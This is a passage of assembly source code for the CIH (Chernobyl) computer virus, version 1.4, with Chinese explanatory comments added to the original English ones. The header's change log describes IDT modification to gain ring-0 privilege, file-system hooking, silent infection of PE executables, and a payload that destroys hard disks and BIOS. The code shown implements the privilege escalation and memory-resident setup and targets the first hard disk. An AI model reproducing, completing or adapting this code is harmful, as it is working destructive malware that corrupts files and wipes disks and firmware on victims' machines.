;CIH病毒1.4版本之中文注釋
;源程序中的英文注釋未作修改,全部保留 **************************************************************************** 
; * The Virus Program Information * 
; **************************************************************************** 
; * * 
; * Designer : CIH Source : TTIT of TATUNG in Taiwan * 
; * Create Date : 04/26/1998 Now Version : 1.4 * 
; * Modification Time : 05/31/1998 * 
; * * 
; * Turbo Assembler Version 4.0 : tasm /m cih * 
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe * ;編譯連接方法 
; * * ;使用的是TurboAssembler 
; *==========================================================================* ;可在Borland C++ 3.1中找到 
; * Modification History * 
; *==========================================================================* 
; * v1.0 1. Create the Virus Program. * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * 
; * 04/26/1998 3. Virus Code doesn't Reload into System. * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * 
; * 6. When System Opens Existing PE File, the File will be * 
; * Infected, and the File doesn't be Reinfected. * 
; * 7. It is also Infected, even the File is Read-Only. * 
; * 8. When the File is Infected, the Modification Date and Time * 
; * of the File also don't be Changed. * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * 
; * Previous FileSystemApiHook, it will Call the Function * 
; * that the IFS Manager Would Normally Call to Implement * 
; * this Particular I/O Request. * 
; * 10. The Virus Size is only 656 Bytes. * 
; *==========================================================================* 
; * v1.1 1. Especially, the File that be Infected will not Increase * 
; * it's Size... ^__^ * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * 
; * When Exception Error Occurs, Our OS System should be in * 
; * Windows NT. So My Cute Virus will not Continue to Run, * 
; * it will Jmup to Original Application to Run. * 
; * 3. Use Better Algorithm, Reduce Virus Code Size. * 
; * 4. The Virus "Basic" Size is only 796 Bytes. * 
; *==========================================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * 
; * 2. Modify the Bug of v1.1 * 
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * 
; *==========================================================================* 
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * 
; * So When Open WinZip Self-Extractor ==> Don't Infect it. * 
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * 
; *==========================================================================* 
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * 
; * 2. Change the Date of Killing Computers. * 
; * 05/31/1998 3. Modify Virus Version Copyright. * 
; * 4. The Virus "Basic" Size is 1019 Bytes. * 
; **************************************************************************** 

.586P ;586保護模式匯編 

; **************************************************************************** 
; * Original PE Executable File(Don't Modify this Section) * 
; **************************************************************************** 

OriginalAppEXE SEGMENT 

FileHeader: ;編譯連接后的PE格式可執行文件文件頭 
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h 
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h 
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh 
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h 
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h 
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh 
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h 
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah 
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h 
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h 
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h 
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h 
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h 
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
dd 00000000h, VirusSize 

OriginalAppEXE ENDS 

; **************************************************************************** 
; * My Virus Game * 
; **************************************************************************** 

; ********************************************************* 
; * Constant Define * 
; ********************************************************* 

TRUE = 1 
FALSE = 0 

DEBUG = FALSE 

MajorVirusVersion = 1 ;主版本號 
MinorVirusVersion = 4 ;副版本號 

VirusVersion = MajorVirusVersion*10h+MinorVirusVersion ;合成版本號 


IF DEBUG ;是否是調試用 

FirstKillHardDiskNumber = 81h ;殺掉第二個硬盤“d：” 
HookExceptionNumber = 05h ;使用5號中斷 

ELSE 

FirstKillHardDiskNumber = 80h ;殺掉第一個硬盤“c：” 
HookExceptionNumber = 03h ;使用3號中斷 

ENDIF 


FileNameBufferSize = 7fh 

; ********************************************************* 
; ********************************************************* 

VirusGame SEGMENT 

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame 
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame 

; ********************************************************* 
; * Ring3 Virus Game Initial Program * 
; ********************************************************* 

MyVirusStart: 
push ebp 

; ************************************* 
; * Let's Modify Structured Exception * 
; * Handing, Prevent Exception Error * 
; * Occurrence, Especially in NT. * 
; ************************************* 

lea eax, [esp-04h*2] 

xor ebx, ebx 
xchg eax, fs:[ebx] 

call @0 
@0: 
pop ebx ;獲取程序起始偏移量? 
;用此偏移量+相對偏移量獲得絕對地址(病毒程序大量用到） 
lea ecx, StopToRunVirusCode-@0[ebx] 
push ecx 

push eax 

; ************************************* 
; * Let's Modify * 
; * IDT(Interrupt Descriptor Table) * 
; * to Get Ring0 Privilege... * 
; ************************************* 

push eax ; 
sidt [esp-02h] ; Get IDT Base Address ?;獲得中斷描述符表的基址到ebx 
pop ebx ; 

add ebx, HookExceptionNumber*08h+04h ; ZF = 0 ;計算要用中斷的基址到ebx 

cli ;在改表項前關中斷? 

mov ebp, [ebx] ; Get Exception Base 
mov bp, [ebx-04h] ; Entry Point ?;取得中斷基址到ebp 

lea esi, MyExceptionHook-@1[ecx] 

push esi ?;esi為病毒中斷例程地址 

mov [ebx-04h], si ; 
shr esi, 16 ; Modify Exception 
mov [ebx+02h], si ; Entry Point Address;修改中斷基址使指向病毒中斷例程 

pop esi 

; ************************************* 
; * Generate Exception to Get Ring0 * 
; ************************************* 

int HookExceptionNumber ; GenerateException;以中斷的方式進入0級 
ReturnAddressOfEndException = $ 

; ************************************* 
; * Merge All Virus Code Section * 
; ************************************* 

push esi 
mov esi, eax ;esi指向病毒開始處 

LoopOfMergeAllVirusCodeSection: 

mov ecx, [eax-04h] 

rep movsb ;拷貝病毒代碼到分配好的系統內存首址 

sub eax, 08h 

mov esi, [eax] 

or esi, esi 
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 ;拷貝結束 

jmp LoopOfMergeAllVirusCodeSection ;拷貝下一段 

QuitLoopOfMergeAllVirusCodeSection: 

pop esi 

; ************************************* 
; * Generate Exception Again * 
; ************************************* 

int HookExceptionNumber ; GenerateException Aga 
;再一次進入0級 

; ************************************* 
; * Let's Restore * 
; * Structured Exception Handing * 
; ************************************* 

ReadyRestoreSE: 
sti ;開中斷 

xor ebx, ebx 

jmp RestoreSE 

; ************************************* 
; * When Exception Error Occurs, * 
; * Our OS System should be in NT. * 
; * So My Cute Virus will not * 
; * Continue to Run, it Jmups to * 
; * Original Application to Run. * 
; ************************************* 

StopToRunVirusCode: 
@1 = StopToRunVirusCode 

xor ebx, ebx 
mov eax, fs:[ebx] 
mov esp, [eax] 

RestoreSE: 
pop dword ptr fs:[ebx] 
pop eax 

; ************************************* 
; * Return Original App to Execute * 
; ************************************* 

pop ebp 

push 00401000h ; Push Original 
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack 
;把原程序的開始地址壓棧 
ret ; Return to Original App Entry Point ;以子程序返回形式返回到原程序的開始處 

; ********************************************************* 
; * Ring0 Virus Game Initial Program * 
; ********************************************************* 

MyExceptionHook: 
@2 = MyExceptionHook 

jz InstallMyFileSystemApiHook ;如果病毒代碼已拷貝好了 
;轉到安裝文件系統鉤子的程序 
; ************************************* 
; * Do My Virus Exist in System !? * 
; ************************************* 

mov ecx, dr0 ;察看dr0是否設置過(dr0為病毒駐留標志) 
jecxz AllocateSystemMemoryPage ;沒有設置,則分配系統內存 

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException 

; ************************************* 
; * Return to Ring3 Initial Program * 
; ************************************* 

ExitRing0Init: 
mov [ebx-04h], bp ; 
shr ebp, 16 ; Restore Exception 
mov [ebx+02h], bp ; ;恢復原來的中斷基址 

iretd ;中斷返回 

; ************************************* 
; * Allocate SystemMemory Page to Use * 
; ************************************* 

AllocateSystemMemoryPage: 

mov dr0, ebx ; Set the Mark of My Virus Exist in System 
;設置dr0,它是病毒駐留的標志